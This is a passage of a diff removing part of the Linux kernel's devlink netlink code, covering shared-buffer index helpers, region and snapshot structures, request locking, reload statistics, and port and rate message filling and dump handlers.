+-static int
+-devlink_sb_th_type_get_from_info(struct genl_info *info,
+-				 enum devlink_sb_threshold_type *p_th_type)
+-{
+-	return devlink_sb_th_type_get_from_attrs(info->attrs, p_th_type);
+-}
+-
+-static int
+-devlink_sb_tc_index_get_from_attrs(struct devlink_sb *devlink_sb,
+-				   struct nlattr **attrs,
+-				   enum devlink_sb_pool_type pool_type,
+-				   u16 *p_tc_index)
+-{
+-	u16 val;
+-
+-	if (!attrs[DEVLINK_ATTR_SB_TC_INDEX])
+-		return -EINVAL;
+-
+-	val = nla_get_u16(attrs[DEVLINK_ATTR_SB_TC_INDEX]);
+-	if (pool_type == DEVLINK_SB_POOL_TYPE_INGRESS &&
+-	    val >= devlink_sb->ingress_tc_count)
+-		return -EINVAL;
+-	if (pool_type == DEVLINK_SB_POOL_TYPE_EGRESS &&
+-	    val >= devlink_sb->egress_tc_count)
+-		return -EINVAL;
+-	*p_tc_index = val;
+-	return 0;
+-}
+-
+-static int
+-devlink_sb_tc_index_get_from_info(struct devlink_sb *devlink_sb,
+-				  struct genl_info *info,
+-				  enum devlink_sb_pool_type pool_type,
+-				  u16 *p_tc_index)
+-{
+-	return devlink_sb_tc_index_get_from_attrs(devlink_sb, info->attrs,
+-						  pool_type, p_tc_index);
+-}
+-
+-struct devlink_region {
+-	struct devlink *devlink;
+-	struct devlink_port *port;
+-	struct list_head list;
+-	union {
+-		const struct devlink_region_ops *ops;
+-		const struct devlink_port_region_ops *port_ops;
+-	};
+-	struct mutex snapshot_lock; /* protects snapshot_list,
+-				     * max_snapshots and cur_snapshots
+-				     * consistency.
+-				     */
+-	struct list_head snapshot_list;
+-	u32 max_snapshots;
+-	u32 cur_snapshots;
+-	u64 size;
+-};
+-
+-struct devlink_snapshot {
+-	struct list_head list;
+-	struct devlink_region *region;
+-	u8 *data;
+-	u32 id;
+-};
+-
+-static struct devlink_region *
+-devlink_region_get_by_name(struct devlink *devlink, const char *region_name)
+-{
+-	struct devlink_region *region;
+-
+-	list_for_each_entry(region, &devlink->region_list, list)
+-		if (!strcmp(region->ops->name, region_name))
+-			return region;
+-
+-	return NULL;
+-}
+-
+-static struct devlink_region *
+-devlink_port_region_get_by_name(struct devlink_port *port,
+-				const char *region_name)
+-{
+-	struct devlink_region *region;
+-
+-	list_for_each_entry(region, &port->region_list, list)
+-		if (!strcmp(region->ops->name, region_name))
+-			return region;
+-
+-	return NULL;
+-}
+-
+-static struct devlink_snapshot *
+-devlink_region_snapshot_get_by_id(struct devlink_region *region, u32 id)
+-{
+-	struct devlink_snapshot *snapshot;
+-
+-	list_for_each_entry(snapshot, &region->snapshot_list, list)
+-		if (snapshot->id == id)
+-			return snapshot;
+-
+-	return NULL;
+-}
+-
+-#define DEVLINK_NL_FLAG_NEED_PORT		BIT(0)
+-#define DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT	BIT(1)
+-#define DEVLINK_NL_FLAG_NEED_RATE		BIT(2)
+-#define DEVLINK_NL_FLAG_NEED_RATE_NODE		BIT(3)
+-#define DEVLINK_NL_FLAG_NEED_LINECARD		BIT(4)
+-
+-static int devlink_nl_pre_doit(const struct genl_ops *ops,
+-			       struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink_linecard *linecard;
+-	struct devlink_port *devlink_port;
+-	struct devlink *devlink;
+-	int err;
+-
+-	devlink = devlink_get_from_attrs(genl_info_net(info), info->attrs);
+-	if (IS_ERR(devlink))
+-		return PTR_ERR(devlink);
+-	devl_lock(devlink);
+-	info->user_ptr[0] = devlink;
+-	if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_PORT) {
+-		devlink_port = devlink_port_get_from_info(devlink, info);
+-		if (IS_ERR(devlink_port)) {
+-			err = PTR_ERR(devlink_port);
+-			goto unlock;
+-		}
+-		info->user_ptr[1] = devlink_port;
+-	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT) {
+-		devlink_port = devlink_port_get_from_info(devlink, info);
+-		if (!IS_ERR(devlink_port))
+-			info->user_ptr[1] = devlink_port;
+-	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_RATE) {
+-		struct devlink_rate *devlink_rate;
+-
+-		devlink_rate = devlink_rate_get_from_info(devlink, info);
+-		if (IS_ERR(devlink_rate)) {
+-			err = PTR_ERR(devlink_rate);
+-			goto unlock;
+-		}
+-		info->user_ptr[1] = devlink_rate;
+-	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_RATE_NODE) {
+-		struct devlink_rate *rate_node;
+-
+-		rate_node = devlink_rate_node_get_from_info(devlink, info);
+-		if (IS_ERR(rate_node)) {
+-			err = PTR_ERR(rate_node);
+-			goto unlock;
+-		}
+-		info->user_ptr[1] = rate_node;
+-	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_LINECARD) {
+-		linecard = devlink_linecard_get_from_info(devlink, info);
+-		if (IS_ERR(linecard)) {
+-			err = PTR_ERR(linecard);
+-			goto unlock;
+-		}
+-		info->user_ptr[1] = linecard;
+-	}
+-	return 0;
+-
+-unlock:
+-	devl_unlock(devlink);
+-	devlink_put(devlink);
+-	return err;
+-}
+-
+-static void devlink_nl_post_doit(const struct genl_ops *ops,
+-				 struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink_linecard *linecard;
+-	struct devlink *devlink;
+-
+-	devlink = info->user_ptr[0];
+-	if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_LINECARD) {
+-		linecard = info->user_ptr[1];
+-		devlink_linecard_put(linecard);
+-	}
+-	devl_unlock(devlink);
+-	devlink_put(devlink);
+-}
+-
+-static struct genl_family devlink_nl_family;
+-
+-enum devlink_multicast_groups {
+-	DEVLINK_MCGRP_CONFIG,
+-};
+-
+-static const struct genl_multicast_group devlink_nl_mcgrps[] = {
+-	[DEVLINK_MCGRP_CONFIG] = { .name = DEVLINK_GENL_MCGRP_CONFIG_NAME },
+-};
+-
+-static int devlink_nl_put_handle(struct sk_buff *msg, struct devlink *devlink)
+-{
+-	if (nla_put_string(msg, DEVLINK_ATTR_BUS_NAME, devlink->dev->bus->name))
+-		return -EMSGSIZE;
+-	if (nla_put_string(msg, DEVLINK_ATTR_DEV_NAME, dev_name(devlink->dev)))
+-		return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_nl_put_nested_handle(struct sk_buff *msg, struct devlink *devlink)
+-{
+-	struct nlattr *nested_attr;
+-
+-	nested_attr = nla_nest_start(msg, DEVLINK_ATTR_NESTED_DEVLINK);
+-	if (!nested_attr)
+-		return -EMSGSIZE;
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, nested_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, nested_attr);
+-	return -EMSGSIZE;
+-}
+-
+-struct devlink_reload_combination {
+-	enum devlink_reload_action action;
+-	enum devlink_reload_limit limit;
+-};
+-
+-static const struct devlink_reload_combination devlink_reload_invalid_combinations[] = {
+-	{
+-		/* can't reinitialize driver with no down time */
+-		.action = DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
+-		.limit = DEVLINK_RELOAD_LIMIT_NO_RESET,
+-	},
+-};
+-
+-static bool
+-devlink_reload_combination_is_invalid(enum devlink_reload_action action,
+-				      enum devlink_reload_limit limit)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(devlink_reload_invalid_combinations); i++)
+-		if (devlink_reload_invalid_combinations[i].action == action &&
+-		    devlink_reload_invalid_combinations[i].limit == limit)
+-			return true;
+-	return false;
+-}
+-
+-static bool
+-devlink_reload_action_is_supported(struct devlink *devlink, enum devlink_reload_action action)
+-{
+-	return test_bit(action, &devlink->ops->reload_actions);
+-}
+-
+-static bool
+-devlink_reload_limit_is_supported(struct devlink *devlink, enum devlink_reload_limit limit)
+-{
+-	return test_bit(limit, &devlink->ops->reload_limits);
+-}
+-
+-static int devlink_reload_stat_put(struct sk_buff *msg,
+-				   enum devlink_reload_limit limit, u32 value)
+-{
+-	struct nlattr *reload_stats_entry;
+-
+-	reload_stats_entry = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_STATS_ENTRY);
+-	if (!reload_stats_entry)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_STATS_LIMIT, limit) ||
+-	    nla_put_u32(msg, DEVLINK_ATTR_RELOAD_STATS_VALUE, value))
+-		goto nla_put_failure;
+-	nla_nest_end(msg, reload_stats_entry);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, reload_stats_entry);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_reload_stats_put(struct sk_buff *msg, struct devlink *devlink, bool is_remote)
+-{
+-	struct nlattr *reload_stats_attr, *act_info, *act_stats;
+-	int i, j, stat_idx;
+-	u32 value;
+-
+-	if (!is_remote)
+-		reload_stats_attr = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_STATS);
+-	else
+-		reload_stats_attr = nla_nest_start(msg, DEVLINK_ATTR_REMOTE_RELOAD_STATS);
+-
+-	if (!reload_stats_attr)
+-		return -EMSGSIZE;
+-
+-	for (i = 0; i <= DEVLINK_RELOAD_ACTION_MAX; i++) {
+-		if ((!is_remote &&
+-		     !devlink_reload_action_is_supported(devlink, i)) ||
+-		    i == DEVLINK_RELOAD_ACTION_UNSPEC)
+-			continue;
+-		act_info = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_ACTION_INFO);
+-		if (!act_info)
+-			goto nla_put_failure;
+-
+-		if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_ACTION, i))
+-			goto action_info_nest_cancel;
+-		act_stats = nla_nest_start(msg, DEVLINK_ATTR_RELOAD_ACTION_STATS);
+-		if (!act_stats)
+-			goto action_info_nest_cancel;
+-
+-		for (j = 0; j <= DEVLINK_RELOAD_LIMIT_MAX; j++) {
+-			/* Remote stats are shown even if not locally supported.
+-			 * Stats of actions with unspecified limit are shown
+-			 * though drivers don't need to register unspecified
+-			 * limit.
+-			 */
+-			if ((!is_remote && j != DEVLINK_RELOAD_LIMIT_UNSPEC &&
+-			     !devlink_reload_limit_is_supported(devlink, j)) ||
+-			    devlink_reload_combination_is_invalid(i, j))
+-				continue;
+-
+-			stat_idx = j * __DEVLINK_RELOAD_ACTION_MAX + i;
+-			if (!is_remote)
+-				value = devlink->stats.reload_stats[stat_idx];
+-			else
+-				value = devlink->stats.remote_reload_stats[stat_idx];
+-			if (devlink_reload_stat_put(msg, j, value))
+-				goto action_stats_nest_cancel;
+-		}
+-		nla_nest_end(msg, act_stats);
+-		nla_nest_end(msg, act_info);
+-	}
+-	nla_nest_end(msg, reload_stats_attr);
+-	return 0;
+-
+-action_stats_nest_cancel:
+-	nla_nest_cancel(msg, act_stats);
+-action_info_nest_cancel:
+-	nla_nest_cancel(msg, act_info);
+-nla_put_failure:
+-	nla_nest_cancel(msg, reload_stats_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_fill(struct sk_buff *msg, struct devlink *devlink,
+-			   enum devlink_command cmd, u32 portid,
+-			   u32 seq, int flags)
+-{
+-	struct nlattr *dev_stats;
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_RELOAD_FAILED, devlink->reload_failed))
+-		goto nla_put_failure;
+-
+-	dev_stats = nla_nest_start(msg, DEVLINK_ATTR_DEV_STATS);
+-	if (!dev_stats)
+-		goto nla_put_failure;
+-
+-	if (devlink_reload_stats_put(msg, devlink, false))
+-		goto dev_stats_nest_cancel;
+-	if (devlink_reload_stats_put(msg, devlink, true))
+-		goto dev_stats_nest_cancel;
+-
+-	nla_nest_end(msg, dev_stats);
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-dev_stats_nest_cancel:
+-	nla_nest_cancel(msg, dev_stats);
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_notify(struct devlink *devlink, enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_NEW && cmd != DEVLINK_CMD_DEL);
+-	WARN_ON(!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED));
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_fill(msg, devlink, cmd, 0, 0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int devlink_nl_port_attrs_put(struct sk_buff *msg,
+-				     struct devlink_port *devlink_port)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-
+-	if (!devlink_port->attrs_set)
+-		return 0;
+-	if (attrs->lanes) {
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_LANES, attrs->lanes))
+-			return -EMSGSIZE;
+-	}
+-	if (nla_put_u8(msg, DEVLINK_ATTR_PORT_SPLITTABLE, attrs->splittable))
+-		return -EMSGSIZE;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_PORT_FLAVOUR, attrs->flavour))
+-		return -EMSGSIZE;
+-	switch (devlink_port->attrs.flavour) {
+-	case DEVLINK_PORT_FLAVOUR_PCI_PF:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
+-				attrs->pci_pf.controller) ||
+-		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER, attrs->pci_pf.pf))
+-			return -EMSGSIZE;
+-		if (nla_put_u8(msg, DEVLINK_ATTR_PORT_EXTERNAL, attrs->pci_pf.external))
+-			return -EMSGSIZE;
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PCI_VF:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
+-				attrs->pci_vf.controller) ||
+-		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER, attrs->pci_vf.pf) ||
+-		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_VF_NUMBER, attrs->pci_vf.vf))
+-			return -EMSGSIZE;
+-		if (nla_put_u8(msg, DEVLINK_ATTR_PORT_EXTERNAL, attrs->pci_vf.external))
+-			return -EMSGSIZE;
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PCI_SF:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_CONTROLLER_NUMBER,
+-				attrs->pci_sf.controller) ||
+-		    nla_put_u16(msg, DEVLINK_ATTR_PORT_PCI_PF_NUMBER,
+-				attrs->pci_sf.pf) ||
+-		    nla_put_u32(msg, DEVLINK_ATTR_PORT_PCI_SF_NUMBER,
+-				attrs->pci_sf.sf))
+-			return -EMSGSIZE;
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PHYSICAL:
+-	case DEVLINK_PORT_FLAVOUR_CPU:
+-	case DEVLINK_PORT_FLAVOUR_DSA:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_NUMBER,
+-				attrs->phys.port_number))
+-			return -EMSGSIZE;
+-		if (!attrs->split)
+-			return 0;
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_SPLIT_GROUP,
+-				attrs->phys.port_number))
+-			return -EMSGSIZE;
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_SPLIT_SUBPORT_NUMBER,
+-				attrs->phys.split_subport_number))
+-			return -EMSGSIZE;
+-		break;
+-	default:
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static int devlink_port_fn_hw_addr_fill(const struct devlink_ops *ops,
+-					struct devlink_port *port,
+-					struct sk_buff *msg,
+-					struct netlink_ext_ack *extack,
+-					bool *msg_updated)
+-{
+-	u8 hw_addr[MAX_ADDR_LEN];
+-	int hw_addr_len;
+-	int err;
+-
+-	if (!ops->port_function_hw_addr_get)
+-		return 0;
+-
+-	err = ops->port_function_hw_addr_get(port, hw_addr, &hw_addr_len,
+-					     extack);
+-	if (err) {
+-		if (err == -EOPNOTSUPP)
+-			return 0;
+-		return err;
+-	}
+-	err = nla_put(msg, DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR, hw_addr_len, hw_addr);
+-	if (err)
+-		return err;
+-	*msg_updated = true;
+-	return 0;
+-}
+-
+-static int devlink_nl_rate_fill(struct sk_buff *msg,
+-				struct devlink_rate *devlink_rate,
+-				enum devlink_command cmd, u32 portid, u32 seq,
+-				int flags, struct netlink_ext_ack *extack)
+-{
+-	struct devlink *devlink = devlink_rate->devlink;
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u16(msg, DEVLINK_ATTR_RATE_TYPE, devlink_rate->type))
+-		goto nla_put_failure;
+-
+-	if (devlink_rate_is_leaf(devlink_rate)) {
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
+-				devlink_rate->devlink_port->index))
+-			goto nla_put_failure;
+-	} else if (devlink_rate_is_node(devlink_rate)) {
+-		if (nla_put_string(msg, DEVLINK_ATTR_RATE_NODE_NAME,
+-				   devlink_rate->name))
+-			goto nla_put_failure;
+-	}
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_RATE_TX_SHARE,
+-			      devlink_rate->tx_share, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_RATE_TX_MAX,
+-			      devlink_rate->tx_max, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (devlink_rate->parent)
+-		if (nla_put_string(msg, DEVLINK_ATTR_RATE_PARENT_NODE_NAME,
+-				   devlink_rate->parent->name))
+-			goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static bool
+-devlink_port_fn_state_valid(enum devlink_port_fn_state state)
+-{
+-	return state == DEVLINK_PORT_FN_STATE_INACTIVE ||
+-	       state == DEVLINK_PORT_FN_STATE_ACTIVE;
+-}
+-
+-static bool
+-devlink_port_fn_opstate_valid(enum devlink_port_fn_opstate opstate)
+-{
+-	return opstate == DEVLINK_PORT_FN_OPSTATE_DETACHED ||
+-	       opstate == DEVLINK_PORT_FN_OPSTATE_ATTACHED;
+-}
+-
+-static int devlink_port_fn_state_fill(const struct devlink_ops *ops,
+-				      struct devlink_port *port,
+-				      struct sk_buff *msg,
+-				      struct netlink_ext_ack *extack,
+-				      bool *msg_updated)
+-{
+-	enum devlink_port_fn_opstate opstate;
+-	enum devlink_port_fn_state state;
+-	int err;
+-
+-	if (!ops->port_fn_state_get)
+-		return 0;
+-
+-	err = ops->port_fn_state_get(port, &state, &opstate, extack);
+-	if (err) {
+-		if (err == -EOPNOTSUPP)
+-			return 0;
+-		return err;
+-	}
+-	if (!devlink_port_fn_state_valid(state)) {
+-		WARN_ON_ONCE(1);
+-		NL_SET_ERR_MSG_MOD(extack, "Invalid state read from driver");
+-		return -EINVAL;
+-	}
+-	if (!devlink_port_fn_opstate_valid(opstate)) {
+-		WARN_ON_ONCE(1);
+-		NL_SET_ERR_MSG_MOD(extack,
+-				   "Invalid operational state read from driver");
+-		return -EINVAL;
+-	}
+-	if (nla_put_u8(msg, DEVLINK_PORT_FN_ATTR_STATE, state) ||
+-	    nla_put_u8(msg, DEVLINK_PORT_FN_ATTR_OPSTATE, opstate))
+-		return -EMSGSIZE;
+-	*msg_updated = true;
+-	return 0;
+-}
+-
+-static int
+-devlink_nl_port_function_attrs_put(struct sk_buff *msg, struct devlink_port *port,
+-				   struct netlink_ext_ack *extack)
+-{
+-	const struct devlink_ops *ops;
+-	struct nlattr *function_attr;
+-	bool msg_updated = false;
+-	int err;
+-
+-	function_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_PORT_FUNCTION);
+-	if (!function_attr)
+-		return -EMSGSIZE;
+-
+-	ops = port->devlink->ops;
+-	err = devlink_port_fn_hw_addr_fill(ops, port, msg, extack,
+-					   &msg_updated);
+-	if (err)
+-		goto out;
+-	err = devlink_port_fn_state_fill(ops, port, msg, extack, &msg_updated);
+-out:
+-	if (err || !msg_updated)
+-		nla_nest_cancel(msg, function_attr);
+-	else
+-		nla_nest_end(msg, function_attr);
+-	return err;
+-}
+-
+-static int devlink_nl_port_fill(struct sk_buff *msg,
+-				struct devlink_port *devlink_port,
+-				enum devlink_command cmd, u32 portid, u32 seq,
+-				int flags, struct netlink_ext_ack *extack)
+-{
+-	struct devlink *devlink = devlink_port->devlink;
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
+-		goto nla_put_failure;
+-
+-	/* Hold rtnl lock while accessing port's netdev attributes. */
+-	rtnl_lock();
+-	spin_lock_bh(&devlink_port->type_lock);
+-	if (nla_put_u16(msg, DEVLINK_ATTR_PORT_TYPE, devlink_port->type))
+-		goto nla_put_failure_type_locked;
+-	if (devlink_port->desired_type != DEVLINK_PORT_TYPE_NOTSET &&
+-	    nla_put_u16(msg, DEVLINK_ATTR_PORT_DESIRED_TYPE,
+-			devlink_port->desired_type))
+-		goto nla_put_failure_type_locked;
+-	if (devlink_port->type == DEVLINK_PORT_TYPE_ETH) {
+-		struct net *net = devlink_net(devlink_port->devlink);
+-		struct net_device *netdev = devlink_port->type_dev;
+-
+-		if (netdev && net_eq(net, dev_net(netdev)) &&
+-		    (nla_put_u32(msg, DEVLINK_ATTR_PORT_NETDEV_IFINDEX,
+-				 netdev->ifindex) ||
+-		     nla_put_string(msg, DEVLINK_ATTR_PORT_NETDEV_NAME,
+-				    netdev->name)))
+-			goto nla_put_failure_type_locked;
+-	}
+-	if (devlink_port->type == DEVLINK_PORT_TYPE_IB) {
+-		struct ib_device *ibdev = devlink_port->type_dev;
+-
+-		if (ibdev &&
+-		    nla_put_string(msg, DEVLINK_ATTR_PORT_IBDEV_NAME,
+-				   ibdev->name))
+-			goto nla_put_failure_type_locked;
+-	}
+-	spin_unlock_bh(&devlink_port->type_lock);
+-	rtnl_unlock();
+-	if (devlink_nl_port_attrs_put(msg, devlink_port))
+-		goto nla_put_failure;
+-	if (devlink_nl_port_function_attrs_put(msg, devlink_port, extack))
+-		goto nla_put_failure;
+-	if (devlink_port->linecard &&
+-	    nla_put_u32(msg, DEVLINK_ATTR_LINECARD_INDEX,
+-			devlink_port->linecard->index))
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure_type_locked:
+-	spin_unlock_bh(&devlink_port->type_lock);
+-	rtnl_unlock();
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_port_notify(struct devlink_port *devlink_port,
+-				enum devlink_command cmd)
+-{
+-	struct devlink *devlink = devlink_port->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_PORT_NEW && cmd != DEVLINK_CMD_PORT_DEL);
+-
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_port_fill(msg, devlink_port, cmd, 0, 0, 0, NULL);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
+-				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static void devlink_rate_notify(struct devlink_rate *devlink_rate,
+-				enum devlink_command cmd)
+-{
+-	struct devlink *devlink = devlink_rate->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_RATE_NEW && cmd != DEVLINK_CMD_RATE_DEL);
+-
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_rate_fill(msg, devlink_rate, cmd, 0, 0, 0, NULL);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
+-				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int devlink_nl_cmd_rate_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink_rate *devlink_rate;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
+-			enum devlink_command cmd = DEVLINK_CMD_RATE_NEW;
+-			u32 id = NETLINK_CB(cb->skb).portid;
+-
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_rate_fill(msg, devlink_rate, cmd, id,
+-						   cb->nlh->nlmsg_seq,
+-						   NLM_F_MULTI, NULL);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_nl_cmd_rate_get_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_rate *devlink_rate = info->user_ptr[1];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_rate_fill(msg, devlink_rate, DEVLINK_CMD_RATE_NEW,
+-				   info->snd_portid, info->snd_seq, 0,
+-				   info->extack);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static bool
+-devlink_rate_is_parent_node(struct devlink_rate *devlink_rate,
+-			    struct devlink_rate *parent)
+-{
+-	while (parent) {
+-		if (parent == devlink_rate)
+-			return true;
+-		parent = parent->parent;
+-	}
+-	return false;
+-}
+-
+-static int devlink_nl_cmd_get_doit(struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
+-			      info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_get_dumpit(struct sk_buff *msg,
+-				     struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (idx < start) {
+-			idx++;
+-			devlink_put(devlink);
+-			continue;
+-		}
+-
+-		devl_lock(devlink);
+-		err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
+-				      NETLINK_CB(cb->skb).portid,
+-				      cb->nlh->nlmsg_seq, NLM_F_MULTI);
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-
+-		if (err)
+-			goto out;
+-		idx++;
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_nl_cmd_port_get_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_port_fill(msg, devlink_port, DEVLINK_CMD_PORT_NEW,
+-				   info->snd_portid, info->snd_seq, 0,
+-				   info->extack);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_port_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_port *devlink_port;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_port, &devlink->port_list, list) {
